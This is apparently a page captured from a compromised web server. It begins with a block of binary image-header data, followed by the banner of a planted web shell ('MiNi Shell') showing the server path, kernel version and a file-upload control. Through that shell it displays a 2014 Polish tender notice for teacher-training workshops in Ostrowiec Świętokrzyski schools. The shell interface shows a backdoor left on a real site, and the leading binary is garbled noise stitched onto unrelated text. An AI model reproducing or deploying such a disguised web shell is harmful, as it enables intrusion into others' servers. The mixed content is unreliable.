JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141013/339216-N-2014.html

<p class="kh_header"><b>Ostrowiec Świętokrzyski: Realizacja form wsparcia dla nauczycieli szkół, przeszkoli znajdujących się na terenie powiatu ostrowieckiego - część druga</b><br>
<b>Numer ogłoszenia: 339216 - 2014; data zamieszczenia: 13.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ogólnokształcących , ul. Jana Kilińskiego 19, 27-400 Ostrowiec Świętokrzyski, woj. świętokrzyskie, tel. 41 265 44 32, faks 41 265 52 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.staszic.ostrowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja form wsparcia dla nauczycieli szkół, przeszkoli znajdujących się na terenie powiatu ostrowieckiego - część druga.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Realizacja form wsparcia dla n-li szkół, przeszkoli znajdujących się na terenie powiatu ostrowieckiego - część druga w ramach projektu Bezpośrednie wsparcie rozwoju szkół i przedszkoli poprzez wdrożenie zmodernizowanego systemu doskonalenia n-li w powiecie ostrowieckim, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
Spotkania w ramach form wsparcia realizowane będą w ramach 38 zadań (części), gdzie każde z zadań dot. realizacji Powiatowego Planu Wspomagania w placówce objętej projektem.
Przedmiotowe zamówienie obejmuje następujące zadania: 

Zad. 1. Realizacja Rocznego Planu Wspomagania (RPW) w Publicznym Przedszkolu nr 7 w Ostrowcu Św.
Obszar wsparcia: Wsparcie kompetencji wychowawczych n-la przedszkola 
Osób: 10
Temat:
Wspieranie kompetencji wychowawczych n-la przedszkola. - Szkol./warsztat, 8 h
Rozwijanie kompetencji n-li w zakresie profilaktyki agresji i przemocy (uzależnienia od gier komputerowych, Internetu). - Szkol./warsztat, 7 h
Wspieranie dziecka w dobrym zachowaniu. - Konsult. grup., 12 h
Konsult. ze specjalistami w zakresie pracy z dzieckiem z problemami w zachowaniu. - Konsult. ind. dla n-li, 10 h
Prawo pracy i prawo oświatowe.	 - Konsult. ind. dla d-ra, 5 h

Zad. 2. Realizacja RPW w Publicznym Przedszkolu nr 11 w Ostrowcu Św.
Obszar wsparcia: Nauczyciel 45+
Osób: 10
Temat:
Stosowanie technik relaksacyjnych w pracy n-la (walka ze stresem, dbanie o właściwą postawę ciała). - Szkol./warsztat, 7 h
Obsługa programów środowiska Microsoft Office i posługiwania się nowoczesnymi technologiami multimedialnymi. - Szkol./warsztat, 8
Obsługa programów  środowiska Microsoft Office i posługiwania się nowoczesnymi technologiami multimedialnymi. - Konsult. grup., 8 
Konsult. grupowe z foniatrą z emisji głosu.	- Konsult. grup., 4 h
Konsult. ind. z psychologiem z zakresu: trening asertywności, sztuka negocjacji, sztuka pozyskiwania słuchaczy, sposoby pozytywnego wyrażania emocji.	 - Konsult. indywidualne dla n-li, 10 h
Prawo pracy i prawo oświatowe w pracy d-ra. - Konsult. indywidualne dla d-ra, 5 h

Zad. 3. Realizacja RPW w Publicznym Przedszkolu nr 12 w Ostrowcu Św.
Obszar wsparcia: Jak i po co prowadzić ewaluację wewnętrzną?
Osób: 14
Temat:
Warsztat poświęcony wspólnej analizie wymagań i charakterystyk opisanych w załączniku do Rozporządzenia Ministra Edukacji Narodowej z dnia 7 października 2009 r. w sprawie nadzoru pedagogicznego (Dz. U. 2009, nr 168, poz. 1324). - Szkol./warsztat, 10 h
Wsparcie zespołów do spraw ewaluacji (m. in. w zakresie opracowania narzędzi badawczych, opracowania i interpretacji zebranych danych, opracowania raportu, sformułowania wniosków i rekomendacji). - Warsztat, 5 h
Kształcenie umiejętności planowania działań na podstawie wniosków z ewaluacji wewnętrznej i zebranych opinii. - Konsult. grupowe, 12 h
Wzmocnienie procesu komunikacji w relacjach nauczyciel - rodzic. - Konsult. indywidualne dla n-li, 10 h
Prawo pracy i prawo oświatowe w pracy d-ra. - Konsult. indywidualne dla d-ra, 5 h

Zad. 4. Realizacja RPW w Publicznym Przedszkolu nr 21 w Ostrowcu Św.
Obszar wsparcia: Nauczyciel 45+
Osób: 12
Temat:
Prawidłowa emisja, higiena głosu czynnego n-la.
Jak radzić sobie ze stresem i sytuacjami stresogennymi w pracy.		
Techniki relaksacyjne - jak rozładować negatywne emocje, frustracje, gniew.		
Wzmocnienie kondycji psychofizycznej n-li, pomoc w profilaktyce zjawiska wypalenia zawodowego. - Szkol./warsztaty, 15 h
Nowoczesne metody i środki nauczania w przedszkolu z wykorzystaniem tablicy interaktywnej.	
Budowa zespołu nauczycielskiego - współdziałanie i współpraca - komunikacja interpersonalna.		
Trening asertywności, sztuka negocjacji, sztuka pozyskiwania słuchaczy, sposoby pozytywnego wyrażania emocji. - Konsult. grupowe, 12 h	
Konsult. ze specjalistami. - Konsult. indywidualne dla n-li, 10 h
Prawo oświatowe i prawo pracy.	 - Konsult. indywidualne dla d-ra, 5 h

Zad. 5. Realizacja RPW w Publicznej Szkole Podstawowej nr 1 w Ostrowcu Św.
Obszar wsparcia: Rodzice są partnerami szkoły
Osób: 20
Temat:
Trening umiejętności wychowawczych i interpersonalnych. - Konsult. grupowe, 12 h
Budowanie relacji na linii nauczyciel - rodzic, w tym:
Obowiązki n-la wobec rodziców. Zadania rodziców wobec szkoły.
Zaplanowanie i przeprowadzenie atrakcyjnego spotkania z rodzicami.
Jak prowadzić rozmowę z rodzicami o niewłaściwych postawach uczniów. - Szkol./warsztat, 15 h
Tematyka wynikająca z realizacji szkoleń. - Konsult. indywidualne dla n-li, 10 h
Budowanie zespołu pracowniczego w placówce oświatowej - zachowanie relacji na linii dyrektor-pracownicy placówki. - Konsult. indywidualne dla d-ra, 5 h

Zad. 6. Realizacja RPW w Publicznej Szkole Podstawowej nr 3 w Ostrowcu Św.
Obszar wsparcia: Jak pomóc uczniowi osiągnąć sukces edukacyjny?
Osób: 17
Temat:
Rozwiązania metodyczne w świetle nowej podstawy programowej.
Skuteczne diagnozowanie ucznia. - Warsztat, 10 h
Formy i metody pracy z uczniem słabym. - Warsztat, 5 h
Skuteczne strategie uczenia się, techniki uczenia się, pomagające uczniowi w przyswajaniu wiedzy. - Konsult. grupowe, 8 h
Ocenianie kształtujące. - Konsult. grupowe, 4 h
Studium przypadku.
Bezpośrednia pomoc we wdrażaniu nabytych umiejętności w pracy z uczniem. - Konsult. indywidualne dla n-li, 10 h
Ewaluacja zewnętrzna i wewnętrzna szkoły. - Konsult. ind. dla d-ra, 5 h

Zad. 7. Realizacja RPW w Publicznej Szkole Podstawowej nr 4 w Ostrowcu Św.
Obszar wsparcia: Nauczyciel 45+
Osób: 20 
Temat:
Zasady dobrej i efektywnej komunikacji oraz kultury konfliktu  - komunikacja interpersonalna.
Sposoby radzenia sobie ze stresem. - Szkol./warsztat, 15 h
Techniki relaksacyjne.
Emisja, estetyka i higiena głosu. - Konsult. grupowe, 12 h
Konsult. ze specjalistami. - Konsult. indywidualne dla n-li, 10 h
Polityka Bezpieczeństwa Przetwarzania Danych Osobowych.
Instrukcja zarządzania systemami informatycznymi służącymi do przetwarzania danych osobowych. - Konsult. indywidualne dla d-ra, 5 h

Zad. 8. Realizacja RPW w Publicznej Szkole Podstawowej nr 5 w Ostrowcu Św.
Obszar wsparcia: Nauczyciel 45+
Osób: 19 
Temat:
Komunikacja interpersonalna.
Asertywność. - Szkol./warsztat, 5 h
Emisja głosu. - Szkol./warsztat, 10 h
Profilaktyka wypalenia zawodowego oraz rozwój osobisty. - Konsult. grupowe, 12 h
W ramach realizacji tematyki obszaru doskonalenia. - Konsult. indywidualne dla n-li, 10 h
Ochrona danych osobowych w placówce. - Konsult. indywidualne dla d-ra, 5 h

Zad. 9. Realizacja RPW w Publicznej Szkole Podstawowej nr 7 w Ostrowcu Św.
Obszar wsparcia: Rodzice są partnerami szkoły
Osób: 18
Temat:
Poznanie przez n-li różnorodnych form współpracy szkoły z rodzicami.
Komunikacja nauczyciel - rodzic, rodzic - nauczyciel.
Jak dobrze przygotować spotkanie z rodzicami, by było efektywne. - Szkolenia/warsztaty, 15 h
Uprawnienia i kompetencje Rady Rodziców.
Nowoczesne formy komunikacji nauczyciel - rodzic (e-dziennik).	 - Konsult. grupowe, 12 h
Konsult. ze specjalistami. - Konsult. indywidualne dla n-li, 10 h
Realizacja i monitorowanie nowej podstawy programowej. - Konsult. indywidualne dla d-ra, 5 h

Zad. 10. Realizacja RPW w Publicznej Szkole Podstawowej nr 9 w Ostrowcu Św.
Obszar wsparcia: Praca z uczniem o specjalnych potrzebach edukacyjnych
Osób: 15
Temat:
Wczesne wspomaganie rozwoju dziecka o specjalnych potrzebach edukacyjnych - diagnoza przez PPP.
Motywowanie i wspieranie uczniów ze specjalnymi potrzebami edukacyjnymi. - Szkol./warsztat, 10 h
Wczesne wspomaganie dziecka z zaburzeniami rozwoju. - Szkol./warsztat, 5 h
Jak pracować z dzieckiem autystycznym, zespołem FAS, Aspergera, zaburzeniami zachowania?
Jak oceniać uczniów z orzeczeniem o kształceniu specjalnym?	- Konsult. grupowe, 12 h
Wczesne wspomaganie rozwoju dziecka o specjalnych potrzebach edukacyjnych - diagnoza PPP. - Konsult. indywidualne dla n-li, 10 h
Ewaluacja zewnętrzna i wewnętrzna pracy szkoły. - Konsult. indywidualne dla d-ra, 5 h

Zad. 11. Realizacja RPW w Publicznej Szkole Podstawowej nr 10 w Ostrowcu Św.
Obszar wsparcia: Nauczyciel 45+
Osób: 12
Temat:
Stosowanie technik relaksacyjnych w pracy n-la (walka ze stresem, dbanie o właściwą postawę ciała). - Konsult. grupowe, 6 h
Wzbogacanie zajęć dydaktycznych o elementy relaksu w klasach 1-6. - Konsult. grupowe, 6 h
Warsztaty z zakresu pracy głosem. - Szkol./warsztat, 6 h
Trening asertywności, sztuka negocjacji, sztuka pozyskiwania słuchaczy, sposoby pozytywnego wyrażania emocji. - Szkol./warsztat, 9 h
Praca głosem. 
Budowanie postawy asertywnej. - Konsult. indywidualne dla n-li, 10 h
Polityka bezpieczeństwa danych osobowych w dokumentacji papierowej oraz elektronicznej. - Konsult. indywidualne dla d-ra, 5 h

Zad. 12. Realizacja RPW w Publicznej Szkole Podstawowej nr 14 w Ostrowcu Św.
Obszar wsparcia: Nauczyciel 45+
Osób: 18
Temat:
Jak radzić sobie ze stresem i sytuacjami stresogennymi w pracy.
Techniki relaksacyjne - jak rozładować nagromadzone  negatywne emocje, frustracje, gniew. - Szkol./warsztat, 10 h
Prawo pracy n-la 45+ w przepisach oświatowych. - Warsztat, 5 h
Trening asertywności, sztuka negocjacji, sztuka pozyskiwania słuchaczy, sposoby pozytywnego wyrażania emocji. - Konsult. grupowe,12 h
Wzmocnienie kondycji psychofizycznej n-li, pomoc w profilaktyce zjawiska wypalenia zawodowego. - Konsult. indywidualne dla n-li, 10 h

Zad. 13. Realizacja RPW w Publicznej Szkole Podstawowej nr 1 w Ćmielowie 
Obszar wsparcia: Ocenianie kształtujące
Osób: 20
Temat:
Ocenianie kształtujące.
Cele lekcji. - Szkol./warsztat, 8 h
Na co będziemy zwracać uwagę?
Informacja zwrotna. - Szkol./warsztat, 7 h
Współpraca z rodzicami. - Konsult. grupowe, 4 h
Ocena kształtująca a sumująca.	- Konsult. grupowe, 4 h
Techniki zadawania pytań - pytania kluczowe.
Ocena koleżeńska i samoocena. - Konsult. grupowe, 4 h
Tematyka wynikająca z realizacji szkoleń. - Konsult. indywidualne dla n-li, 10 h
Ochrona danych osobowych w placówce oświatowej.	 - Konsult. indywidualne dla d-ra, 5 h

Zad. 14. Realizacja RPW w Publicznej Szkole Podstawowej w Waśniowie
Obszar wsparcia: Wykorzystanie EWD w ewaluacji wewnętrznej szkoły 
Osób: 16 
Temat:
Obsługa kalkulatora EWD 100. - Szkol./warsztat, 5 h
Wykorzystanie kalkulatora EWD 100 do analizy i interpretacji wyników egzaminacyjnych. - Warsztat, 5 h
Planowanie pracy n-la i wychowawcy w oparciu o wyniki EWD. - Warsztat, 5 h
Strategie uczenia się i szybkiego zapamiętywania. - Konsult. grupowe, 8 h
Jak prowadzić motywujące rozmowy z rodzicami uczniów o niskich efektach edukacyjnych. - Konsult. grupowe, 4 h
Indywidualne wsparcie n-la przy wdrażaniu metod i form uczenia się i szybkiego zapamiętywania. - Konsult. indywidualne dla n-li, 10 h
Dostęp do informacji publicznej w placówkach oświatowych, kontakty z mediami w sytuacjach kryzysowych. - Konsult. indywidualne dla d-ra, 5 h

Zad. 15. Realizacja RPW w Publicznej Szkole Podstawowej w Kunowie
Obszar wsparcia: Techniki uczenia się i metody motywujące do nauki
Osób: 20
Temat:
Rola pracy zespołowej. 
Organizacja pracy zespołowej.
Komunikacja interpersonalna. - Szkol./warsztat, 5 h
Techniki efektywnego uczenia usprawniające pamięć, koncentrację, szybkie czytanie.	 - Szkol./warsztat, 5 h
Motywowanie uczniów do nauki - metody oddziaływania na uczniów. - Szkol./warsztat, 5 h
Techniki multimedialne w edukacji uczniów. - Konsult. grupowe, 8 h
Budowanie aktywności edukacyjnej ucznia. - Konsult. grupowe, 4 h
Techniki i metody motywujące do nauki. - Konsult. indywidualne dla n-li, 10 h
Zmiany w prawie oświatowym. - Konsult. indywidualne dla d-ra, 5 h

Zad. 16. Realizacja RPW w Publicznej Szkole Podstawowej w Bodzechowie
Obszar wsparcia: Rodzice są partnerami szkoły
Osób: 18 
Temat:
Przepisy kodeksu karnego  - sytuacje sporne: nauczyciel, uczeń, rodzic (spotkanie z policjantem). - Szkol., 5 h
Formy współpracy n-li z rodzicami.
Formy współpracy i zaangażowania rodziców na rzecz placówki.
Jak dobrze przygotować spotkanie z rodzicami - by było efektywne. - Warsztat, 10 h
Diagnoza potrzeb  rodziców i ich oczekiwania wobec szkoły.
Wpływ  n-li na zmiany postaw rodzicielskich. - Konsult. grupowe, 8 h
Uprawnienia i kompetencje Rady Rodziców. - Konsult. grupowe, 4 h
Jak prowadzić rozmowę z rodzicami o niewłaściwych postawach i wyborach dzieci - doradztwo kuratora sądowego.
Rodzice w szkole - jak zmienić spór we współpracę.	 - Konsult. indywidualne dla n-li, 10 h
Prawo pracy i oświatowe w pracy d-ra. - Konsult. indywidualne dla d-ra, 5 h

Zad. 17. Realizacja RPW w Publicznej Szkole Podstawowej w Mominie
Obszar wsparcia: Jak pomóc uczniowi osiągnąć sukces edukacyjny?
Osób: 20
Temat:
Motywowanie uczniów do nauki.	
Formy i metody pracy z uczniem zdolnym.
Formy i metody pracy z uczniem słabym. - Szkolenia/warsztaty, 15 h
Budowanie informacji zwrotnej dla ucznia, rodzica o postępach w nauce.
Metody oceniania kształtującego. - Konsult. grupowe, 12 h
Konsult. ze specjalistami. - Konsult. indywidualne dla n-li, 10 h
Dostęp do informacji publicznej w placówkach oświatowych, kontakty z mediami w sytuacjach kryzysowych. - Konsult. indywidualne dla d-ra, 5 h

Zad. 18. Realizacja RPW w Publicznym Gimnazjum nr 1 w Ostrowcu Św.
Obszar wsparcia: Nauczyciel 45+
Osób: 18
Temat:
Techniki relaksacyjne w pracy n-la - walka ze stresem, dbanie o właściwą postawę ciała.
Emisja głosu. - Warsztat, 8 h
Obsługa programów środowiska Microsoft Office (programy użytkowe pod kątem pracy n-la). - Warsztat, 7 h
Posługiwanie się nowoczesnymi technologiami multimedialnymi - Prezi. - Konsult. grupowe, 8 h
Sztuka negocjacji.
Sztuka pozyskiwania słuchaczy.
Sposoby pozytywnego wyrażania emocji.	- Konsult. grupowe, 4 h
TIK na poszczególnych zajęciach edukacyjnych.
Przepisy prawne wspomagające n-la w profilaktyce zdrowotnej. - Konsult. indywidualne dla n-li, 10 h
Techniki mediacji i negocjacji na linii przełożony-podwładny. - Konsult. indywidualne dla d-ra, 5 h

Zad. 19. Realizacja RPW w Publicznym Gimnazjum nr 2 w Ostrowcu Św.
Obszar wsparcia: Nauczyciel 45+
Osób: 25
Temat:
Zasady dobrej i efektywnej komunikacji oraz kultury konfliktu - komunikacja interpersonalna. - Szkol./warsztat, 8 h
Sposoby radzenia sobie ze stresem z uwzględnieniem technik relaksacyjnych. - Szkol./warsztat, 7 h
Zdrowy styl życia w walce z wypaleniem zawodowym. - Konsult. grupowe, 8 h
Emisja, estetyka i higiena  głosu. - Konsult. grupowe, 4 h
Konsult. indywidualne z dietetykiem.
Konflikty - jak je rozwiązywać - indywidualne przypadki.
Foniatra. - Konsult. indywidualne dla n-li, 10 h
Prawo oświatowe i prawo pracy.	 - Konsult. indywidualne dla d-ra, 5 h

Zad. 20. Realizacja RPW w Publicznym Gimnazjum nr 3 w Ostrowcu Św.
Obszar wsparcia: Jak pomóc uczniowi osiągnąć sukces edukacyjny?
Osób: 18
Temat:
Motywowanie i indywidualizowanie pracy z uczniem z orzeczeniem o upośledzeniu w stopniu lekkim.
Budowanie poprawnych relacji nauczyciel - rodzic.
Jak prowadzić rozmowę z rodzicami o niewłaściwych postawach dzieci. - Szkol./warsztat, 15 h
Nowoczesne metody i formy pracy.
Strategie aktywnego nauczania i skutecznego uczenia się. - Konsult. grupowe, 12 h
Studium przypadku ucznia. - Konsult. indywidualne dla n-li, 10 h
Ochrona danych osobowych w placówce. - Konsult. indywidualne dla d-ra, 5 h

Zad. 21. Realizacja RPW w Publicznym Gimnazjum nr 4 w Ostrowcu Św.
Obszar wsparcia: Nauczyciel 45+
Osób: 20
Temat:
Prawidłowa emisja, estetyka i higiena głosu czynnego n-la. - Szkol./warsztat, 5 h
Jak radzić sobie ze stresem i sytuacjami stresogennymi w pracy.
Techniki relaksacyjne  - jak rozładować nagromadzone  negatywne emocje, frustracje, gniew. - Warsztat, 5 h
Prawo pracy n-la 45+ w przepisach oświatowych. - Warsztat, 5 h
Wzmocnienie kondycji psychofizycznej n-li, pomoc w profilaktyce zjawiska wypalenia zawodowego. - Konsult. grupowe, 12 h
Przepisy prawne wspomagające n-li w profilaktyce zdrowotnej. - Konsult. indywidualne dla n-li, 10 h
Prawo pracy i prawo oświatowe.	 - Konsult. indywidualne dla d-ra, 5 h

Zad. 22. Realizacja RPW w Publicznym Gimnazjum nr 5 w Ostrowcu Św.
Obszar wsparcia: Praca z uczniem o specjalnych potrzebach edukacyjnych
Osób: 20 
Temat:
Diagnozowanie mocnych i słabych stron dziecka - praca  z uczniem o specyficznych  potrzebach edukacyjnych. - Konsult. grupowe, 4 h
Jak poprawnie interpretować opinię PPP oraz wdrażać jej zalecenia w codziennej pracy z uczniem. - Konsult. grupowe, 4 h
Trudna klasa - jak ją opanować, wychowywać i nauczać? - Konsult. grupowe, 4 h
Indywidualizacja pracy z dzieckiem ze specjalnymi potrzebami edukacyjnymi w zespole klasowym (z elementami lekcji pokazowej). - Szkol./warsztat, 4 h
Jak prowadzić motywującą rozmowę z uczniem o niewłaściwych postawach edukacyjnych i wychowawczych z  jego rodzicami. - Szkol./warsztat, 5 h
Metody i techniki relaksacyjne w pracy z uczniem o szczególnych potrzebach oraz edukacyjnych. - Szkol./warsztat, 6 h
Studium przypadku ucznia o specjalnych potrzebach edukacyjnych. - Konsult. indywidualne dla n-li, 10 h
Dane osobowe w zbiorach GIODO. Instrukcja kancelaryjna szkoły i jednolity wykaz akt. - Konsult. indywidualne dla d-ra, 5 h

Zad. 23. Realizacja RPW w Publicznym Gimnazjum w Szewnie
Obszar wsparcia: Ocenianie kształtujące
Osób: 20
Temat:
Metody oceniania kształtującego.
Zastosowanie informacji zwrotnej w ocenianiu oraz w komunikacji z rodzicami uczniów. - Szkol. /warsztaty, 15 h
Stosowanie metod oceniania kształtującego w gimnazjum na wszystkich przedmiotach.
Gromadzenie i analiza danych dotyczących skuteczności wprowadzanych metod. - Konsult. grupowe, 12 h
Konsult. ze specjalistami. - Konsult. indywidualne dla n-li, 10 h
Ochrona danych osobowych w placówce oświatowej, elementy prawa oświatowego. - Konsult. indywidualne dla d-ra, 5 h

Zad. 24. Realizacja RPW w Publicznym Gimnazjum w Kunowie
Obszar wsparcia: Ocenianie kształtujące
Osób: 20
Temat:
Ocenianie kształtujące.
Cele lekcji.		
Na co będziemy zwracać uwagę?		
Informacja zwrotna. 
Współpraca z rodzicami. - Szkol./warsztat, 15 h
Ocena kształtująca a sumująca.	 
Techniki zadawania pytań - pytania kluczowe.
Ocena koleżeńska i samoocena. - Konsult. grupowe, 12 h
Tematyka wynikająca z realizacji szkoleń. - Konsult. indywidualne dla n-li, 10 h
Wykorzystanie wyników egzaminu gimnazjalnego EWD. - Konsult. indywidualne dla d-ra, 5 h

Zad. 25. Realizacja RPW w Publicznym Gimnazjum w Waśniowie
Obszar wsparcia: Budowanie koncepcji pracy szkoły
Osób: 18
Temat:
Podstawy tworzenia kierunku rozwoju szkoły. - Szkol./warsztat, 6 h
Przygotowanie planu działań oraz umiejscowienie poszczególnych pracowników szkoły w jej koncepcji. - Konsult. grupowe, 12 h
Poznanie innych narzędzi niż ankieta do właściwego zdiagnozowania potrzeb szkoły.	 - Szkol./warsztat, 5 h
Rola rodzica w realizacji koncepcji pracy szkoły. - Szkol./warsztat, 4 h
Tematyka wynikająca z realizacji szkoleń. - Konsult. indywidualne dla n-li, 10 h
Polityka bezpieczeństwa danych osobowych w dokumentacji papierowej i elektronicznej. - Konsult. indywidualne dla d-ra, 5 h

Zad. 26. Realizacja RPW w Publicznym Gimnazjum w Bałtowie
Obszar wsparcia: Rodzice są partnerami szkoły
Osób: 18
Temat:
Nowoczesne formy komunikacji n-li i rodziców: e-dziennik. - Szkol., 5 h
Formy współpracy n-li z rodzicami.
Formy współpracy i zaangażowania rodziców na rzecz placówki.
Diagnoza potrzeb  rodziców i ich oczekiwania wobec szkoły. - Warsztat, 10 h
Komunikacja nauczyciel - rodzic, rodzic - nauczyciel.
Jak dobrze przygotować spotkanie z rodzicami - by było efektywne. - Konsult. grupowe, 8 h
Uprawnienia i kompetencje Rady Rodziców. - Konsult. grupowe, 4 h
Trudny uczeń, trudny rodzic - doradztwo kuratora sądowego.
Indywidualne wsparcie n-la wychowawcy przez psychologa. - Konsult. indywidualne dla n-li, 10 h
Ochrona danych osobowych w placówce oświatowej.	- Konsult. indywidualne dla d-ra, 5 h

Zad. 27. Realizacja RPW w Liceum Ogólnokształcącym Nr I im. St. Staszica w Ostrowcu Św.
Obszar wsparcia: Rodzice są partnerami szkoły
Osób: 18
Temat:
Trening umiejętności wychowawczych i interpersonalnych. - Konsult. grupowe, 12 h
Budowanie relacji na linii nauczyciel - rodzic, w tym:
Obowiązki n-la wobec rodziców. Zadania rodziców wobec szkoły.
Zaplanowanie i przeprowadzenie atrakcyjnego spotkania z rodzicami.
Jak prowadzić rozmowę z rodzicami o niewłaściwych postawach uczniów. - Szkol./warsztat, 15 h
Tematyka wynikająca z realizacji szkoleń. - Konsult. indywidualne dla n-li, 10 h
Polityka bezpieczeństwa danych osobowych w dokumentacji papierowej oraz elektronicznej. - Konsult. indywidualne dla d-ra, 5 h

Zad. 28. Realizacja RPW w Liceum Ogólnokształcącym Nr II im. Joachima Chreptowicza w Ostrowcu Św.
Obszar wsparcia: Nauczyciel 45+
Osób: 13
Temat:
Stosowanie technik relaksacyjnych w pracy n-la (walka ze stresem, dbanie o właściwą postawę ciała). - Szkol./warsztat, 6 h
